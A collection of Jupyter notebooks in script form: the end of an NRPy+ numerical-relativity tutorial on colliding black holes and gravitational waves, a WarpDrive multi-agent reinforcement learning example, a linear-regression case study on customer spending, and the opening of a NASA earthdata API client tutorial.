REAL ReY_sm2_l2_m0,ImY_sm2_l2_m0; SpinWeight_minus2_SphHarmonics(2,0, th,ph, &ReY_sm2_l2_m0,&ImY_sm2_l2_m0); const REAL sinth = sin(xx[1][i1]); /* psi4 *{}_{-2}_Y_{20}* (int dphi)* sinth*dtheta */ Psi4r_0pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_0PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4r_1pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_1PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4r_2pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4R_2PTGF,idx)]*ReY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_0pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_0PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_1pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_1PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; Psi4i_2pt_l2m0 += diagnostic_output_gfs[IDX4pt(PSI4I_2PTGF,idx)]*ImY_sm2_l2_m0 * (2*M_PI) * sinth*dxx[1]; } fprintf(outPsi4_l2m0,"%e %.15e %.15e %.15e %.15e %.15e %.15e\n", (double)((n)*dt), (double)Psi4r_0pt_l2m0,(double)Psi4r_1pt_l2m0,(double)Psi4r_2pt_l2m0, (double)Psi4i_0pt_l2m0,(double)Psi4i_1pt_l2m0,(double)Psi4i_2pt_l2m0); fclose(outPsi4_l2m0); } // Evaluate Hamiltonian constraint violation Hamiltonian_constraint(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, y_n_gfs, diagnostic_output_gfs); sprintf(filename,"out1D-%d.txt",Nxx[0]); FILE *out2D; if(n==0) out2D = fopen(filename, "w"); else out2D = fopen(filename, "a"); LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, Nxx_plus_2NGHOSTS[1]/2,Nxx_plus_2NGHOSTS[1]/2+1, Nxx_plus_2NGHOSTS[2]/2,Nxx_plus_2NGHOSTS[2]/2+1) { const int idx = IDX3(i0,i1,i2); REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; REAL xCart[3]; #include "xxCart.h" fprintf(out2D,"%e %e %e\n", (double)sqrt(xCart[0]*xCart[0] + xCart[1]*xCart[1] + xCart[2]*xCart[2]), (double)y_n_gfs[IDX4pt(CFGF,idx)],(double)log10(fabs(diagnostic_output_gfs[IDX4pt(HGF,idx)]))); } fprintf(out2D,"\n\n"); fclose(out2D); } // Step 3.b: Step forward one timestep (t -> t+dt) in time using // chosen RK-like MoL timestepping algorithm #include 
"../MoLtimestepping/RK_MoL.h" // Step 3.c: If t=t_final, output conformal factor & Hamiltonian // constraint violation to 2D data file if(n==N_final-1) { // Evaluate Hamiltonian constraint violation Hamiltonian_constraint(Nxx,Nxx_plus_2NGHOSTS,dxx, xx, y_n_gfs, diagnostic_output_gfs); char filename[100]; sprintf(filename,"out%d.txt",Nxx[0]); FILE *out2D = fopen(filename, "w"); const int i0MIN=NGHOSTS; // In spherical, r=Delta r/2. const int i1mid=Nxx_plus_2NGHOSTS[1]/2; const int i2mid=Nxx_plus_2NGHOSTS[2]/2; LOOP_REGION(NGHOSTS,Nxx_plus_2NGHOSTS[0]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[1]-NGHOSTS, NGHOSTS,Nxx_plus_2NGHOSTS[2]-NGHOSTS) { REAL xx0 = xx[0][i0]; REAL xx1 = xx[1][i1]; REAL xx2 = xx[2][i2]; REAL xCart[3]; #include "xxCart.h" int idx = IDX3(i0,i1,i2); fprintf(out2D,"%e %e %e %e\n",xCart[1],xCart[2], y_n_gfs[IDX4pt(CFGF,idx)], log10(fabs(diagnostic_output_gfs[IDX4pt(HGF,idx)]))); } fclose(out2D); } // Step 3.d: Progress indicator printing to stderr // Step 3.d.i: Measure average time per iteration #ifdef __linux__ // Use high-precision timer in Linux. clock_gettime(CLOCK_REALTIME, &end); const long long unsigned int time_in_ns = 1000000000L * (end.tv_sec - start.tv_sec) + end.tv_nsec - start.tv_nsec; #else // Resort to low-resolution, standards-compliant timer in non-Linux OSs time(&end_timer); // Resolution of one second... REAL time_in_ns = difftime(end_timer,start_timer)*1.0e9+0.5; // Round up to avoid divide-by-zero. 
#endif const REAL s_per_iteration_avg = ((REAL)time_in_ns / (REAL)n) / 1.0e9; const int iterations_remaining = N_final - n; const REAL time_remaining_in_mins = s_per_iteration_avg * (REAL)iterations_remaining / 60.0; const REAL num_RHS_pt_evals = (REAL)(Nxx[0]*Nxx[1]*Nxx[2]) * 4.0 * (REAL)n; // 4 RHS evals per gridpoint for RK4 const REAL RHS_pt_evals_per_sec = num_RHS_pt_evals / ((REAL)time_in_ns / 1.0e9); // Step 3.d.ii: Output simulation progress to stderr if(n % 10 == 0) { fprintf(stderr,"%c[2K", 27); // Clear the line fprintf(stderr,"It: %d t=%.2f dt=%.2e | %.1f%%; ETA %.0f s | t/h %.2f | gp/s %.2e\r", // \r is carriage return, move cursor to the beginning of the line n, n * (double)dt, (double)dt, (double)(100.0 * (REAL)n / (REAL)N_final), (double)time_remaining_in_mins*60, (double)(dt * 3600.0 / s_per_iteration_avg), (double)RHS_pt_evals_per_sec); fflush(stderr); // Flush the stderr buffer } // End progress indicator if(n % 10 == 0) } // End main loop to progress forward in time. fprintf(stderr,"\n"); // Clear the final line of output from progress indicator. // Step 4: Free all allocated memory free(bc_parity_conditions); free(bc_gz_map); #include "../MoLtimestepping/RK_Free_Memory.h" for(int i=0;i<3;i++) free(xx[i]); return 0; } # + # Nr = 270 # Ntheta = 8 Nr = 800 Ntheta = 16 CFL_FACTOR = 1.0 import cmdline_helper as cmd print("Now compiling, should take ~10 seconds...\n") start = time.time() cmd.C_compile("BSSN/BrillLindquist_Playground.c", "BrillLindquist_Playground") end = time.time() print("Finished in "+str(end-start)+" seconds.\n\n") if Nr == 800: print("Now running. Should take ~8 hours...\n") if Nr == 270: print("Now running. 
Should take ~30 minutes...\n") start = time.time() cmd.delete_existing_files("out*.txt") cmd.delete_existing_files("out*.png") cmd.Execute("BrillLindquist_Playground", str(Nr)+" "+str(Ntheta)+" 2 "+str(CFL_FACTOR)) end = time.time() print("Finished in "+str(end-start)+" seconds.\n\n") # - # <a id='compare'></a> # # # Step 8: Comparison with black hole perturbation theory \[Back to [top](#toc)\] # $$\label{compare}$$ # # According to black hole perturbation theory ([Berti et al](https://arxiv.org/abs/0905.2975)), the resultant black hole should ring down with dominant, spin-weight $s=-2$ spherical harmonic mode $(l=2,m=0)$ according to # # $$ # {}_{s=-2}\text{Re}(\psi_4)_{l=2,m=0} = A e^{−0.0890 t/M} \cos(0.3737 t/M+ \phi), # $$ # # where $M=1$ for these data, and $A$ and $\phi$ are an arbitrary amplitude and phase, respectively. Here we will plot the resulting waveform at $r/M=33.13$, comparing to the expected frequency and amplitude falloff predicted by black hole perturbation theory. # # Notice that we find about 4.2 orders of magnitude agreement! If you are willing to invest more resources and wait much longer, you will find approximately 8.5 orders of magnitude agreement (*better* than Fig 6 of [Ruchlin et al](https://arxiv.org/pdf/1712.07658.pdf)) if you adjust the above code parameters such that # # 1. Finite-differencing order is set to 10 # 1. Nr = 800 # 1. Ntheta = 16 # 1. Outer boundary (`AMPL`) set to 300 # 1. Final time (`t_final`) set to 275 # 1. 
Set the initial positions of the BHs to `BH1_posn_z = -BH2_posn_z = 0.25` # + # %matplotlib inline import numpy as np # from scipy.interpolate import griddata import matplotlib.pyplot as plt from matplotlib.pyplot import savefig # from IPython.display import HTML # import matplotlib.image as mgimg from matplotlib import rc rc('text', usetex=True) if Nr == 270: extraction_radius = "33.13" Amplitude = 7e-2 Phase = 2.8 elif Nr == 800: extraction_radius = "33.64" Amplitude = 1.8e-2 Phase = 2.8 else: print("Error: output is not tuned for Nr = "+str(Nr)+" . Plotting disabled.") exit(1) #Transposed for easier unpacking: t,psi4r1,psi4r2,psi4r3,psi4i1,psi4i2,psi4i3 = np.loadtxt("outPsi4_l2m0-"+str(Nr)+"-r"+extraction_radius+".txt").T t_retarded = [] log10abspsi4r = [] bh_pert_thry = [] for i in range(len(psi4r1)): retarded_time = t[i]-np.float(extraction_radius) t_retarded.append(retarded_time) log10abspsi4r.append(np.log(np.float(extraction_radius)*np.abs(psi4r1[i] + psi4r2[i] + psi4r3[i]))/np.log(10)) bh_pert_thry.append(np.log(Amplitude*np.exp(-0.0890*retarded_time)*np.abs(np.cos(0.3737*retarded_time+Phase)))/np.log(10)) # print(bh_pert_thry) fig, ax = plt.subplots() plt.title("Grav. 
Wave Agreement with BH perturbation theory",fontsize=18) plt.xlabel("$(t - R_{ext})/M$",fontsize=16) plt.ylabel('$\log_{10}|\psi_4|$',fontsize=16) ax.plot(t_retarded, log10abspsi4r, 'k-', label='SENR/NRPy+ simulation') ax.plot(t_retarded, bh_pert_thry, 'k--', label='BH perturbation theory') #ax.set_xlim([0,t_retarded[len(psi4r1)-1]]) ax.set_xlim([0,240]) ax.set_ylim([-13,-1.5]) plt.xticks(size = 14) plt.yticks(size = 14) legend = ax.legend(loc='upper right', shadow=True, fontsize='x-large') legend.get_frame().set_facecolor('C1') plt.show() # Note that you'll need `dvipng` installed to generate the following file: savefig("BHperttheorycompare.png",dpi=150) # - # <a id='visual'></a> # # # Step 9: Data Visualization Animations \[Back to [top](#toc)\] # $$\label{visual}$$ # # <a id='installdownload'></a> # # ## Step 9.a: Install `scipy` and download `ffmpeg` if they are not yet installed/downloaded \[Back to [top](#toc)\] # $$\label{installdownload}$$ # # Note that if you are not running this within `mybinder`, but on a Windows system, `ffmpeg` must be installed using a separate package (on [this site](http://ffmpeg.org/)), or (if running Jupyter within Anaconda, use the command: `conda install -c conda-forge ffmpeg`). # + # print("Ignore any warnings or errors from the following command:") # # !pip install scipy > /dev/null # # check_for_ffmpeg = !which ffmpeg >/dev/null && echo $? # if check_for_ffmpeg != ['0']: # print("Couldn't find ffmpeg, so I'll download it.") # # Courtesy https://johnvansickle.com/ffmpeg/ # # !wget http://astro.phys.wvu.edu/zetienne/ffmpeg-static-amd64-johnvansickle.tar.xz # # !tar Jxf ffmpeg-static-amd64-johnvansickle.tar.xz # print("Copying ffmpeg to ~/.local/bin/. Assumes ~/.local/bin is in the PATH.") # # !mkdir ~/.local/bin/ # # !cp ffmpeg-static-amd64-johnvansickle/ffmpeg ~/.local/bin/ # print("If this doesn't work, then install ffmpeg yourself. 
It should work fine on mybinder.") # - # <a id='genimages'></a> # # ## Step 9.b: Generate images for visualization animation \[Back to [top](#toc)\] # $$\label{genimages}$$ # # Here we loop through the data files output by the executable compiled and run in [the previous step](#mainc), generating a [png](https://en.wikipedia.org/wiki/Portable_Network_Graphics) image for each data file. # # **Special thanks to <NAME>. His work with the first versions of these scripts greatly contributed to the scripts as they exist below.** # + # ## VISUALIZATION ANIMATION, PART 1: Generate PNGs, one per frame of movie ## # import numpy as np # from scipy.interpolate import griddata # import matplotlib.pyplot as plt # from matplotlib.pyplot import savefig # from IPython.display import HTML # import matplotlib.image as mgimg # import glob # import sys # from matplotlib import animation # globby = glob.glob('out96-00*.txt') # file_list = [] # for x in sorted(globby): # file_list.append(x) # bound=1.4 # pl_xmin = -bound # pl_xmax = +bound # pl_ymin = -bound # pl_ymax = +bound # for filename in file_list: # fig = plt.figure() # x,y,cf,Ham = np.loadtxt(filename).T #Transposed for easier unpacking # plotquantity = cf # plotdescription = "Numerical Soln." # plt.title("Black Hole Head-on Collision (conf factor)") # plt.xlabel("y/M") # plt.ylabel("z/M") # grid_x, grid_y = np.mgrid[pl_xmin:pl_xmax:300j, pl_ymin:pl_ymax:300j] # points = np.zeros((len(x), 2)) # for i in range(len(x)): # # Zach says: No idea why x and y get flipped... 
# points[i][0] = y[i] # points[i][1] = x[i] # grid = griddata(points, plotquantity, (grid_x, grid_y), method='nearest') # gridcub = griddata(points, plotquantity, (grid_x, grid_y), method='cubic') # im = plt.imshow(gridcub, extent=(pl_xmin,pl_xmax, pl_ymin,pl_ymax)) # ax = plt.colorbar() # ax.set_label(plotdescription) # savefig(filename+".png",dpi=150) # plt.close(fig) # sys.stdout.write("%c[2K" % 27) # sys.stdout.write("Processing file "+filename+"\r") # sys.stdout.flush() # - # <a id='genvideo'></a> # # ## Step 9.c: Generate visualization animation \[Back to [top](#toc)\] # $$\label{genvideo}$$ # # In the following step, [ffmpeg](http://ffmpeg.org) is used to generate an [mp4](https://en.wikipedia.org/wiki/MPEG-4) video file, which can be played directly from this Jupyter notebook. # + # ## VISUALIZATION ANIMATION, PART 2: Combine PNGs to generate movie ## # # https://stackoverflow.com/questions/14908576/how-to-remove-frame-from-matplotlib-pyplot-figure-vs-matplotlib-figure-frame # # https://stackoverflow.com/questions/23176161/animating-pngs-in-matplotlib-using-artistanimation # fig = plt.figure(frameon=False) # ax = fig.add_axes([0, 0, 1, 1]) # ax.axis('off') # myimages = [] # for i in range(len(file_list)): # img = mgimg.imread(file_list[i]+".png") # imgplot = plt.imshow(img) # myimages.append([imgplot]) # ani = animation.ArtistAnimation(fig, myimages, interval=100, repeat_delay=1000) # plt.close() # ani.save('BH_Head-on_Collision.mp4', fps=5,dpi=150) # + ## VISUALIZATION ANIMATION, PART 3: Display movie as embedded HTML5 (see next cell) ## # https://stackoverflow.com/questions/18019477/how-can-i-play-a-local-video-in-my-ipython-notebook # + # # %%HTML # <video width="480" height="360" controls> # <source src="BH_Head-on_Collision.mp4" type="video/mp4"> # </video> # - # <a id='convergence'></a> # # # Step 10: Visualize the numerical error, and confirm that it converges to zero with increasing numerical resolution (sampling) \[Back to [top](#toc)\] # 
$$\label{convergence}$$ # + # x96,y96,valuesCF96,valuesHam96 = np.loadtxt('out96.txt').T #Transposed for easier unpacking # pl_xmin = -2.5 # pl_xmax = +2.5 # pl_ymin = -2.5 # pl_ymax = +2.5 # grid_x, grid_y = np.mgrid[pl_xmin:pl_xmax:100j, pl_ymin:pl_ymax:100j] # points96 = np.zeros((len(x96), 2)) # for i in range(len(x96)): # points96[i][0] = x96[i] # points96[i][1] = y96[i] # grid96 = griddata(points96, valuesCF96, (grid_x, grid_y), method='nearest') # grid96cub = griddata(points96, valuesCF96, (grid_x, grid_y), method='cubic') # grid96 = griddata(points96, valuesHam96, (grid_x, grid_y), method='nearest') # grid96cub = griddata(points96, valuesHam96, (grid_x, grid_y), method='cubic') # # fig, ax = plt.subplots() # plt.clf() # plt.title("96x16 Num. Err.: log_{10}|Ham|") # plt.xlabel("x/M") # plt.ylabel("z/M") # fig96cub = plt.imshow(grid96cub.T, extent=(pl_xmin,pl_xmax, pl_ymin,pl_ymax)) # cb = plt.colorbar(fig96cub) # + # x72,y72,valuesCF72,valuesHam72 = np.loadtxt('out72.txt').T #Transposed for easier unpacking # points72 = np.zeros((len(x72), 2)) # for i in range(len(x72)): # points72[i][0] = x72[i] # points72[i][1] = y72[i] # grid72 = griddata(points72, valuesHam72, (grid_x, grid_y), method='nearest') # griddiff_72_minus_96 = np.zeros((100,100)) # griddiff_72_minus_96_1darray = np.zeros(100*100) # gridx_1darray_yeq0 = np.zeros(100) # grid72_1darray_yeq0 = np.zeros(100) # grid96_1darray_yeq0 = np.zeros(100) # count = 0 # for i in range(100): # for j in range(100): # griddiff_72_minus_96[i][j] = grid72[i][j] - grid96[i][j] # griddiff_72_minus_96_1darray[count] = griddiff_72_minus_96[i][j] # if j==49: # gridx_1darray_yeq0[i] = grid_x[i][j] # grid72_1darray_yeq0[i] = grid72[i][j] + np.log10((72./96.)**4) # grid96_1darray_yeq0[i] = grid96[i][j] # count = count + 1 # plt.clf() # fig, ax = plt.subplots() # plt.title("4th-order Convergence, at t/M=7.5 (post-merger; horiz at x/M=+/-1)") # plt.xlabel("x/M") # plt.ylabel("log10(Relative error)") # 
ax.plot(gridx_1darray_yeq0, grid96_1darray_yeq0, 'k-', label='Nr=96') # ax.plot(gridx_1darray_yeq0, grid72_1darray_yeq0, 'k--', label='Nr=72, mult by (72/96)^4') # ax.set_ylim([-8.5,0.5]) # legend = ax.legend(loc='lower right', shadow=True, fontsize='x-large') # legend.get_frame().set_facecolor('C1') # plt.show() # - # <a id='latex_pdf_output'></a> # # # Step 11: Output this notebook to $\LaTeX$-formatted PDF file \[Back to [top](#toc)\] # $$\label{latex_pdf_output}$$ # # The following code cell converts this Jupyter notebook into a proper, clickable $\LaTeX$-formatted PDF file. After the cell is successfully run, the generated PDF may be found in the root NRPy+ tutorial directory, with filename # [Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.pdf](Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.pdf) (Note that clicking on this link may not work; you may need to open the PDF file through another means.) # !jupyter nbconvert --to latex --template latex_nrpy_style.tplx Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.ipynb # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !pdflatex -interaction=batchmode Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.tex # !rm -f Tut*.out Tut*.aux Tut*.log
notebook/Tutorial-Start_to_Finish-BSSNCurvilinear-Two_BHs_Collide-Psi4.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # Copyright (c) 2021, salesforce.com, inc.\ # All rights reserved.\ # SPDX-License-Identifier: BSD-3-Clause\ # For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause # Get started quickly with end-to-end multi-agent RL using WarpDrive! This shows a basic example to create a simple multi-agent Tag environment and get training. For more configuration options and indepth explanations, check out the other tutorials and source code. # **Try this notebook on [Colab](http://colab.research.google.com/github/salesforce/warp-drive/blob/master/tutorials/simple-end-to-end-example.ipynb)!** # # ⚠️ PLEASE NOTE: # This notebook runs on a GPU runtime.\ # If running on Colab, choose Runtime > Change runtime type from the menu, then select `GPU` in the 'Hardware accelerator' dropdown menu. # # Dependencies # You can install the warp_drive package using # # - the pip package manager, OR # - by cloning the warp_drive package and installing the requirements. # # On Colab, we will do the latter. # + import sys IN_COLAB = "google.colab" in sys.modules if IN_COLAB: # ! git clone https://github.com/salesforce/warp-drive.git % cd warp-drive # ! pip install -e . else: # ! 
pip install rl_warp_drive

# +
import torch

from example_envs.tag_continuous.tag_continuous import TagContinuous
from warp_drive.env_wrapper import EnvWrapper
from warp_drive.training.trainer import Trainer
# NOTE(review): create_and_push_data_placeholders is imported but not used in
# this notebook's visible cells -- presumably kept for parity with the other
# tutorials; confirm before removing.
from warp_drive.training.utils.data_loader import create_and_push_data_placeholders

# Allocate a small CUDA tensor up front so any GPU/driver initialization
# failure surfaces here, before environment construction.
pytorch_cuda_init_success = torch.cuda.FloatTensor(8)

# +
# Set logger level e.g., DEBUG, INFO, WARNING, ERROR
import logging

logging.getLogger().setLevel(logging.ERROR)
# -

# # Environment, Training, and Model Hyperparameters

# Specify a set of run configurations for your experiments.
# Note: these override some of the default configurations in 'warp_drive/training/run_configs/default_configs.yaml'.

run_config = dict(
    name="tag_continuous",
    # Environment settings
    env=dict(
        num_taggers=5,
        num_runners=20,
        episode_length=100,
        seed=1234,
        use_full_observation=False,
        num_other_agents_observed=10,
        tagging_distance=0.02,
    ),
    # Trainer settings
    trainer=dict(
        num_envs=100,  # number of environment replicas (number of GPU blocks used)
        train_batch_size=10000,  # total batch size used for training per iteration (across all the environments)
        num_episodes=5000,  # total number of episodes to run the training for (can be arbitrarily high!)
    ),
    # Policy network settings
    # Two separate A2C policies are trained, one per agent type; note the
    # runner policy uses a higher learning rate (0.005) than the tagger (0.002).
    policy=dict(
        runner=dict(
            to_train=True,  # flag indicating whether the model needs to be trained
            algorithm="A2C",  # algorithm used to train the policy
            gamma=0.98,  # discount rate
            lr=0.005,  # learning rate
            model=dict(
                type="fully_connected", fc_dims=[256, 256], model_ckpt_filepath=""
            ),  # policy model settings
        ),
        tagger=dict(
            to_train=True,
            algorithm="A2C",
            gamma=0.98,
            lr=0.002,
            model=dict(
                type="fully_connected", fc_dims=[256, 256], model_ckpt_filepath=""
            ),
        ),
    ),
    # Checkpoint saving setting
    saving=dict(
        metrics_log_freq=10,  # how often (in iterations) to print the metrics
        model_params_save_freq=5000,  # how often (in iterations) to save the model parameters
        basedir="/tmp",  # base folder used for saving
        name="continuous_tag",  # experiment name
        tag="example",  # experiment tag
    ),
)

# # End-to-End Training Loop

# +
# Create a wrapped environment object via the EnvWrapper
# Ensure that use_cuda is set to True (in order to run on the GPU)
env_wrapper = EnvWrapper(
    TagContinuous(**run_config["env"]),
    num_envs=run_config["trainer"]["num_envs"],
    use_cuda=True,
)

# Agents can share policy models: this dictionary maps policy model names to agent ids.
policy_tag_to_agent_id_map = {
    "tagger": list(env_wrapper.env.taggers),
    "runner": list(env_wrapper.env.runners),
}

# Create the trainer object
trainer = Trainer(
    env_wrapper=env_wrapper,
    config=run_config,
    policy_tag_to_agent_id_map=policy_tag_to_agent_id_map,
)

# Perform training!
trainer.train() # Shut off gracefully trainer.graceful_close() # - # # Learn more and explore our tutorials # To learn more about WarpDrive, take a look at these tutorials # - [WarpDrive basics](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-1-warp_drive_basics.ipynb) # - [WarpDrive sampler](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-2-warp_drive_sampler.ipynb) # - [WarpDrive reset and log](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-3-warp_drive_reset_and_log.ipynb) # - [Creating custom environments](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-4-create_custom_environments.md) # - [Training with WarpDrive](https://www.github.com/salesforce/warp-drive/blob/master/tutorials/tutorial-5-training_with_warp_drive.ipynb)
tutorials/simple-end-to-end-example.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     language: python
#     name: python3
# ---

# +
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# -

# Customer-behaviour dataset: per-customer session/app/website usage metrics
# plus the yearly amount spent (the regression target used below).
data = pd.read_csv('FyntraCustomerData.csv')

data.shape

data.head()

# ### 1. Compute -- Use seaborn to create a jointplot to compare the Time on Website and Yearly Amount Spent columns. Is there a correlation?

sns.jointplot(x=data['Time_on_Website'], y=data['Yearly_Amount_Spent'])
plt.show()

data[['Time_on_Website', 'Yearly_Amount_Spent']].corr()

# +
# There is no significant correlation between the attributes 'Time on website'
# and 'Yearly amount spent'
# -

# ### 2. Compute – Do the same as above but now with Time on App and Yearly Amount Spent. Is this correlation stronger than 1st One?

sns.jointplot(x=data['Time_on_App'], y=data['Yearly_Amount_Spent'])
plt.show()

data[['Time_on_App', 'Yearly_Amount_Spent']].corr()

# +
# This correlation is better compared to the previous one.
# -

# ### 3. Compute -- Explore types of relationships across the entire data set using pairplot . Based off this plot what looks to be the most correlated feature with Yearly Amount Spent?

# The question asks for a pairplot (the original cell only drew a heatmap);
# draw the pairplot, and keep the correlation heatmap as a compact numeric
# summary of the same pairwise relationships.
sns.pairplot(data)
sns.heatmap(data.corr())

# +
# Length of Membership seems to be most correlated with Yearly amount spent.
# -

# ### 4. Compute – Create linear model plot of Length of Membership and Yearly Amount Spent. Does the data fits well in linear plot?

# +
x = data['Length_of_Membership']
y = data['Yearly_Amount_Spent']

# Least-squares fit of a degree-1 polynomial (slope m, intercept c).
m, c = np.polyfit(x, y, 1)
plt.plot(x, m * x + c)
plt.scatter(x, y)
plt.xlabel('Length_of_Membership')
plt.ylabel('Yearly_Amount_Spent')
plt.title('Length_of_Membership Vs Yearly_Amount_Spent')
plt.show()

# +
# The data fits well with linear plot
# -

# ### 5. Compute – Train and Test the data and answer multiple questions -- What is the use of random_state=85?

from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_error

# +
x = data[['Avg_Session_Length', 'Time_on_App', 'Time_on_Website', 'Length_of_Membership']]
y = data['Yearly_Amount_Spent']

# random_state=85 seeds the pseudo-random shuffling performed by
# train_test_split, so the exact same train/test partition is reproduced on
# every run; the particular value 85 is arbitrary.
train_x, test_x, train_y, test_y = train_test_split(
    x, y, random_state=85, test_size=0.3)
# -

print(train_x.shape)
print(train_y.shape)
print(test_x.shape)
print(test_y.shape)

# ### 6. Compute – Predict the data and do a scatter plot. Check if actual and predicted data match?

lin_model = LinearRegression()
lin_model.fit(train_x, train_y)
predicted = lin_model.predict(test_x)

plt.scatter(x=test_y, y=predicted)
plt.xlabel('Actual')
plt.ylabel('predicted')
plt.title('Actual Vs predicted')
plt.show()

# ### 7. What is the value of Root Mean Squared Error?

rmse = np.sqrt(mean_squared_error(test_y, predicted))
rmse
Module 6/Module_6+Case+study+3.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#     jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3 (ipykernel)
#     language: python
#     name: python3
# ---

# + [markdown] tags=[]
# # NASA Earthdata API Client 🌍
#
# ## Overview
#
# > TL;DR: **earthdata** uses NASA APIs to search, preview and access NASA datasets on-prem and in the cloud with 4 lines of Python.
#
# There are many ways to access NASA datasets, we can use the Earthdata search portal. We can use DAAC specific portals or tools.
# We could even use data.gov! These web portals are great but... they are not designed for programmatic access and reproducible workflows.
# This is extremely important in the age of the cloud and reproducible open science.
#
# The good news is that NASA also exposes APIs that allow us to search, transform and access data in a programmatic way.
# There are already some very useful client libraries for these APIs:
#
# * python-cmr
# * eo-metadata-tools
# * harmony-py
# * Hyrax (OpenDAP)
# * cmr-stac
# * others
#
# Each of these libraries has amazing features and some similarities.
# * [cmr-stac](https://medium.com/pangeo/intake-stac-nasa-4cd78d6246b7) is probably the best option for a streamlined workflow from dataset search and discovery to efficiently loading data using python libraries like pandas or xarray.
# * [*Harmony-py*](https://harmony.earthdata.nasa.gov/) is the more capable client if we want to preprocess the data beforehand (reformat NetCDF to Zarr, reproject, subset). Unfortunately not all datasets are yet covered by Harmony.
#
# In this context, **earthdata** aims to be a simple library that can deal with the important parts of the metadata so we can access or download data without having to worry if a given dataset is on-prem or in the cloud.
# -

# ## Querying for data collections
# The DataCollection client can query CMR for any collection using all of CMR's Query parameters and has built-in accessors for the common ones.
# This makes it ideal for one liners and easier notation.

# ### NASA EDL and the Auth class

# We import the classes from earthdata
from earthdata import Auth, DataCollections, DataGranules, Store

# auth = Auth().login(strategy="interactive")
auth = Auth().login(strategy="netrc")

# ### Auth
#
# The core function of Auth is to deal with cloud credentials and in some cases CMR authenticated queries.
# If we belong to an early adopter group within NASA we can pass the Auth object to the other classes when we instantiate them.
#
# ```python
# # An anonymous query to CMR
# Query = DataCollections().keyword('elevation')
# # An authenticated query to CMR
# Query = DataCollections(auth).keyword('elevation')
# ```
#
# and it's the same with DataGranules
#
# ```python
# # An anonymous query to CMR
# Query = DataGranules().keyword('elevation')
# # An authenticated query to CMR
# Query = DataGranules(auth).keyword('elevation')
# ```

# +
# We can now search for collections using a pythonic API client for CMR.
# Query = DataCollections(auth).keyword('fire').temporal("2016-01-01", "2020-12-12")
# Query = DataCollections(auth).keyword('GEDI').bounding_box(-134.7,58.9,-133.9,59.2)
Query = DataCollections().keyword('elevation').bounding_box(-134.7,58.9,-133.9,59.2)
print(f'Collections found: {Query.hits()}')

# filtering what UMM fields to print, to see the full record we omit the fields filters
# meta is always included as
collections = Query.fields(['ShortName','Abstract']).get(10)
# Inspect 5 results printing just the ShortName and Abstract
collections[0:3]
# -

# the results from DataCollections and DataGranules are enhanced python dict objects, we still can get all the fields from CMR
collections[0]["umm.ShortName"]

# The DataCollections class returns python dictionaries with some handy methods.
#
# ```python
# collection.concept_id() # returns the concept-id, used to search for data granules
# collection.abstract() # returns the abstract
# collection.landing_page() # returns the landing page if present in the UMM fields
# collection.get_data() # returns the portal where data can be accessed.
# ```
#
# The same results can be obtained using the `dict` syntax:
#
# ```python
# collection["meta"]["concept-id"] # concept-id
# collection["umm"]["RelatedUrls"] # URLs, with GET DATA, LANDING PAGE etc
# ```

# +
# We can now search for collections using a pythonic API client for CMR.
Query = DataCollections().daac("PODAAC")

print(f'Collections found: {Query.hits()}')
collections = Query.fields(['ShortName']).get(20)
# Printing 3 collections
collections[0]

# +
# What if we want cloud collections
Query = DataCollections().daac("PODAAC").cloud_hosted(True)

print(f'Collections found: {Query.hits()}')
collections = Query.fields(['ShortName']).get(20)
# Printing 3 collections
collections[0]
# -

# Printing the concept-id for the first 10 collections
[collection.concept_id() for collection in collections[0:10]]

# ## Querying for data granules
#
# The DataGranules class provides similar functionality as the collection class. To query for granules in a more reliable way concept-id would be the main key.
# You can search data granules using a short name but that could (more likely will) return different versions of the same data granules.
#
# In this example we're querying for 20 data granules from ICESat-2 [ATL03](https://nsidc.org/data/ATL03/versions/) version `005` dataset.

# +
# Generally speaking we won't need the auth instance for queries to collections and granules
# Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2)
Query = DataGranules().short_name('ATL03').version("005").bounding_box(-134.7,58.9,-133.9,59.2)
granules = Query.get(20)
